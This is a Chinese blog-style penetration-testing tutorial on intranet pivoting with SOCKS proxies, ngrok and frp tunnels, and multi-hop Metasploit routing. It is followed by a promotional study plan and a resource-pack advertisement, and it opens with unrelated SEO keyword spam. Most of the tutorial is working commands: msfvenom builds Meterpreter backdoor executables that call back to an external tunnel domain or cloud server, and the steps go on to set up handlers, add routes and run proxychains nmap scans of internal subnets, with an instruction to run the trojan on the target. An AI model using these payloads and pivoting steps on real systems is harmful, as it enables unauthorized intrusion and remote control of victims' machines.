自己怎么做微信小程序网站,深圳建设局网站,国家企业信息公示网查询全国,在手机上怎么制作网站内网安全#xff1a;Socks 代理 || 本地代理 技术.
Socks
代理又称全能代理#xff0c;就像有很多跳线的转接板#xff0c;它只是简单地将一端的系统连接到另外一端。支持多种协议#xff0c;包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型#xff…内网安全Socks 代理 || 本地代理 技术.
Socks
代理又称全能代理就像有很多跳线的转接板它只是简单地将一端的系统连接到另外一端。支持多种协议包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型socks 4只支持TCP协议而socks 5支持TCP/UDP协议还支持各种身份验证机制等协议。其标准端口为1080. 目录
内网安全Socks 代理 技术.
两个内网通讯上线 Ngrok
1开通隧道
2下载客户端
3生成一个程序后门
4进行监听kali
两个内网通讯上线 Frp 自建跳板
1跳板环境搭建
2生成程序后面
3进行监听kali
本地代理 MSF 跳板多个内网主机系列
第二层内网代理
1信息收集及配置访问
2开启本地代理
3内网扫描
4浏览器访问
第三层内网代理
1生成正向程序后门
2进行监听
3信息收集及配置访问
4开启本地代理
第四层内网渗透
1生成正向程序后门
2进行监听 代理解决的问题1内网有外网 2内网有过滤 3内网无外网两个内网通讯上线 Ngrok
开通隧道工具https://www.ngrok.cc/user.html理解二个内网主机不能相互连接的这样就可以通过开通的隧道进行连接.
开通的隧道就是在外网开通一个域名当目标访问这个域名则会将数据返还回来到kali中1开通隧道 2下载客户端 解压放到 kali 中切换的刚刚下载的文件目录中1./sunny clientid 115735315695 // 执行 ./sunny clientid 隧道的IP3生成一个程序后门木马
msfvenom -p windows/meterpreter/reverse_http lhostbgxg.free.idcfengye.com lport80 -f exe -o bgxg.exe4进行监听kali
1msfconsole2use exploit/multi/handler3set payload windows/meterpreter/reverse_http4set lhost 192.168.0.106 // 本地的 IP 地址5set lport 4444 // 本地的 端口.6exploit两个内网通讯上线 Frp 自建跳板
1跳板环境 搭建
需要有自己的服务器有来搭建跳板.【服务器 和 控制端】需要下载的工具https://github.com/fatedier/frp/releases服务器修改配置文件 frps.ini
[common]
bind_port 6677 // 这个端口修改为 服务器 开放的就行启动服务端【切换在下载的目录并执行】
./frps -c ./frps.ini控制端修改配置文件 frpc.ini
[common]
server_addr 云主机 IP 地址
server_port 6677 // frpc 工作端口必须和上面 frps 保持一致
[msf]
type tcp
local_ip 127.0.0.1
local_port 5555 // 转发给本机的 5555
remote_port 6000 // 服务端用 6000 端口转发给本机启动客户端【切换在下载的目录并执行】
./frpc -c ./frpc.ini2生成程序后面木马
msfvenom -p windows/meterpreter/reverse_tcp lhost服务器公网的IP地址 lport6000 -f exe -o frp.exe3进行监听kali
1msfconsole2use exploit/multi/handler3set payload windows/meterpreter/reverse_tcp4set LHOST 127.0.0.1 5set LPORT 5555 // 本机监听的端口【和控制端的一样】6exploit然后把程序后门木马放在目标主机上执行就行.本地代理 MSF 跳板多个内网主机系列
第二层内网代理
1信息收集及配置访问
1run get_local_subnets // 获取网络接口2run autoroute -p // 查看路由地址3run autoroute -s 10.0.20.0/24 // 添加地二层内网的路由网段.或3run post/multi/manage/autoroute // 自动添加目前所有路由网段2开启本地代理
background // 挂起会话如果是msf6使用代理模板为use auxiliary/server/socks_proxy如果是msf5使用代理模板为use auxiliary/server/socks4a1set srvport 2222 // 设置本地代理端口为22222exploit // 运行3内网扫描
打开 /etc/proxychains4.conf 文件socks4 192.168.0.106 2222 // 添加 本地的代理和端口进行扫描proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 -Pn扫描主机检测其是否受到数据包过滤软件或防火墙的保护.-sT扫描 TCP 数据包已建立的连接 connect4浏览器访问 第三层内网代理
1生成正向程序后门
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT54321 -f exe 54321.exe2进行监听
要在和上面一样的 msf 会话中执行.1use exploit/multi/handler 2set payload windows/x64/meterpreter/bind_tcp3set rhost 10.0.20.99 // 第二层内网的 IP 地址4set lport 54321 // 和程序后面木马一样的端口5exploit3信息收集及配置访问
1run get_local_subnets // 获取网络接口2run autoroute -p // 查看路由地址3run post/multi/manage/autoroute // 自动添加目前所有路由网段.4开启本地代理
background // 挂起会话如果是msf6使用代理模板为use auxiliary/server/socks_proxy如果是msf5使用代理模板为use auxiliary/server/socks4a1set srvport 6666 // 默认端口66662exploit // 运行第四层内网渗透
1生成正向程序后门
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT9876 -f exe 9876.exe2进行监听
要在和上面一样的 msf 会话中执行.1use exploit/multi/handler 2set payload windows/x64/meterpreter/bind_tcp3set rhost 10.0.10.110 // 第二层内网的 IP 地址4set lport 9876 // 和程序后面木马一样的端口5exploit学习链接第70天内网安全- 域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili
接下来我将给各位同学划分一张学习计划表
学习计划
那么问题又来了作为萌新小白我应该先学什么再学什么 既然你都问的这么直白了我就告诉你零基础应该从什么开始学起
阶段一初级网络安全工程师
接下来我将给大家安排一个为期1个月的网络安全初级计划当你学完后你基本可以从事一份网络安全相关的工作比如渗透测试、Web渗透、安全服务、安全分析等岗位其中如果你等保模块学的好还可以从事等保工程师。
综合薪资区间6k~15k
1、网络安全理论知识2天 ①了解行业相关背景前景确定发展方向。 ②学习网络安全相关法律法规。 ③网络安全运营的概念。 ④等保简介、等保规定、流程和规范。非常重要
2、渗透测试基础1周 ①渗透测试的流程、分类、标准 ②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking ③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察 ④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础1周 ①Windows系统常见功能和命令 ②Kali Linux系统常见功能和命令 ③操作系统安全系统入侵排查/系统加固基础
4、计算机网络基础1周 ①计算机网络基础、协议和架构 ②网络通信原理、OSI模型、数据转发流程 ③常见协议解析HTTP、TCP/IP、ARP等 ④网络攻击技术与网络安全防御技术 ⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作2天 ①数据库基础 ②SQL语言基础 ③数据库安全加固
6、Web渗透1周 ①HTML、CSS和JavaScript简介 ②OWASP Top10 ③Web漏洞扫描工具 ④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等 那么到此为止已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗
阶段二中级or高级网络安全工程师看自己能力
综合薪资区间15k~30k
7、脚本编程学习4周 在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力。
零基础入门的同学我建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDEPHP环境推荐Wamp和XAMPPIDE强烈推荐Sublime
Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》没必要看完
用Python编写漏洞的exp,然后写一个简单的网络爬虫
PHP基本语法学习并书写一个简单的博客系统
熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选)
了解Bootstrap的布局或者CSS。
阶段三顶级网络安全工程师
如果你对网络安全入门感兴趣那么你需要的话可以点击这里网络安全重磅福利入门进阶全套282G学习资源包免费分享 学习资料分享
当然只给予计划不给予学习资料的行为无异于耍流氓这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包可点击下方二维码链接领取哦。
